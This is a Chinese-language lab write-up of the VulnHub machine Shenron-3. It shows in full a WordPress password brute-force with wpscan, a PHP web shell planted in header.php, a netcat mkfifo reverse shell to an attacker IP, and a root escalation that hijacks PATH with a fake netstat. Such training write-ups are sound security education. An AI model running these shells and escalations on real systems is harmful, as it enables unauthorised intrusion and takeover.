Shenron-3靶机实战

  • Shenron-3靶机实战已关闭评论
  • 39 views
  • A+

1.靶机简介

这个靶机是Shenron系列的第三部

靶机名称:Shenron-3;

下载地址为:https://download.vulnhub.com/shenron/shenron-3.ova

2.主机发现

nmap -sP 192.168.204.0/24
nmap -sC -sV -p- 192.168.204.132

wKg0C2CwxeSAKxtvAAEtYZ7uabk658.png

使用nmap扫描得知靶机的ip地址为:192.168.204.132;靶机开通了80端口,开启了http服务,网站是由WordPress搭建的。

3.开始攻击

我们修改一下hosts文件,然后访问这个网站。

wKg0C2Cw2YmAPZvKAABobCNGUwE011.png

wKg0C2Cw2aWAevZxAAClh6daCA237.png

没有发现留言板之类可以用户上传的板块。我们使用gobuster来扫描一下网站的目录,尝试找突破点。

Gobuster这款工具基于Go编程语言开发,广大研究人员可使用该工具来对目录、文件、DNS和VHost等对象进行暴力破解攻击。

Gobuster可爆破的对象包括:

1、目标站点中的URI(目录或文件);

2、DNS子域名(支持通配符);

3、目标Web服务器的虚拟主机名(VHost);

```
gobuster dir -u http://shenron/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php

```

wKg0C2CxmVqAZoQFAAFPARtzbeU000.png

wp-login.php应该是后台的登录界面,我们访问后台使用用户名admin,密码admin等弱密码尝试登录。

wKg0C2CxmgmATdY6AABjIGzLBNA861.png

当用户名为admin的时候,给出的提示是“您为用户名admin输入的密码不正确”这说明admin这个用户可能是存在的。既然网站是用WordPress搭建的,我们尝试使用wpscan爆破一下密码。

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。WordPress是全球流行的博客网站,全球有上百万人使用它来搭建博客。

wpscan --url http://shenron --passwords /usr/share/wordlists/rockyou.txt --usernames admin

--url指定网址; --passwords 指定爆破字典 --usernames指定用户名

wKg0C2CxqaWAfEiOAADX2MSzpao467.png

成功爆破出后台的登录页面,用户名为admin,密码为iloverockyou,我们成功以管理员的身份登录,所以我要做的第一件事就是检测我是否可以上传PHP文件,或者编辑后台的PHP代码。我们进入后台的editor编辑器中,发现似乎可以修改header.php,在PHP代码中加入一句话木马echo system($_REQUEST['cmd']);

wKg0C2CxsCGALo7bAAE5JXhN2E4780.png

我们验证一下一句话木马是否能用

wKg0C2CxsLWAf7HNAAFIfZu17FQ727.png

我们尝试获取一个反弹Shell,这里使用burpsuite抓包、发包以及对命令进行编码。

我们在pentestmonkey中找到netcat使用反弹Shell的代码,将其使用URL编码,同时在kail攻击机中使用netcat监听1234端口rlwrap nc -lnvp 1234 成功获得反弹Shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.130 1234 >/tmp/f

wKg0C2CxvNqAbbuOAAB8aDRCdU274.png

wKg0C2CxvhmAVRVJAABW2KzUmFk830.png

我们对反弹Shell进行优化

export TERM=xterm
python3 -c 'import pty; pty.spawn("/bin/bash")'

wKg0C2Cxv1qAJz0NAABp21VO92c292.png

4.提权

既然我们拿到了www-data用户的权限,我们可以尝试进行提权最终来获取到root的权限。

首先我们看一下www-data用户的目录下的文件,看一下有没有什么有用的信息。

wKg0C2CxwFuAforYAAFwjJ6CXpg052.png

在wp-config.php文件中,通过筛选“user”和“pass”关键字,查找到一个密码“[email protected]”,查看home目录发现有一个shenron用户,我们尝试切换到shenron用户,使用密码[email protected],但是没有成功。又尝试一下使用刚刚后台管理员的密码“iloverockyou”成功切换到shenron用户。

wKg0C2CxwXSAAq3hAACv33oVxxU455.png

wKg0C2CxwumAZH0QAABQ3ZLdFA4267.png

我们进入/home/shenron目录,查看一下里面的文件,发现一个名为“network”的可以执行程序,它的属主和属组都是root。

wKg0C2C0TF2AIGM0AACtfpnqnWI454.png

我们使用kali端搭建简单的http服务器,使用靶机下载pspy64,我们可以使用pspy来查看在network运行之后执行的操作。

pspy 是一个命令行工具,它可以在不需要 root 权限的情况下查看后台进程。它允许您在执行时查看其他用户运行的命令、cron 作业等。非常适合在 CTF 中枚举 Linux 系统。

wKg0C2C0SCaASzbvAAAsLwQG5iE855.png

wKg0C2C0SAAah7ZAACOK3fWka0794.png

我们给pspy64添加可执行权限,然后执行network之后再执行pspy64查看后台程序的运行情况。

wKg0C2C0Tk6AV5NEAABT7KZ9Reg486.png

我们发现在network运行的时候,会同时调用netstat,我们可以在tmp目录下创建一个netstat文件并写入"/bin/bash -p",给其添加可执行权限后,再修改PATH改为tmp目录下我们新创建的netstat文件。这样在运行network程序的时候,可以调用我们修改后的netstat文件

wKg0C2C0UCCAWOWJAABlXaWmaEk937.png

我们执行network程序,发现我们成功拿到了root权限,进入root目录,拿到flag!

wKg0C2C0UcOASZYxAAArbgpBIB8803.png

wKg0C2C0UeKAaB7jAABrL2CnojM325.png

相关推荐: 从CTF比赛真题中学习压缩包伪加密与图片隐写术

先讲个笑话,刚刚打完MAR DASCTF明御攻防赛,一如往常,很轻松便拿到了两个flag(签到与问卷),哈哈,一个脑细胞都不用消耗 好了下面通过其中的一道misc题,一起学习一下伪加密与图片隐写的破解 本文知识点: 遇到加密压缩文件怎么办?需要哪些工具 遇到图…